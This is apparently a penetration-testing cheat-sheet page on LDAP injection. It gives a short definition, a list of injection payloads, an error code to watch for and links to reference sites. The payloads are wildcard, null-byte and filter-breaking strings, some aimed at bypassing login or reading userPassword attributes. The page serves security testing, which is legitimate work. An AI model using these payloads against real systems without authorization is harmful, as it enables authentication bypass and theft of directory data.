# LDAP Injection

LDAP Injection is a type of security vulnerability that can occur in web applications that use Lightweight Directory Access Protocol (LDAP) for authentication and/or authorization. It is a form of injection attack similar to SQL injection, but instead of targeting a database, it targets an LDAP server.

### Payloads

```
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
```

### Errors

When testing for LDAP Injection, sometimes only an error will be output in the response. For example, the error code `0x80005000` : 

{% embed url="<https://learn.microsoft.com/en-us/answers/questions/566916/exception-unknown-error-(0x80005000)-while-creatin>" %}

### References

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection>" %}

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ldap-injection>" %}

{% embed url="<https://portswigger.net/kb/issues/00100500_ldap-injection>" %}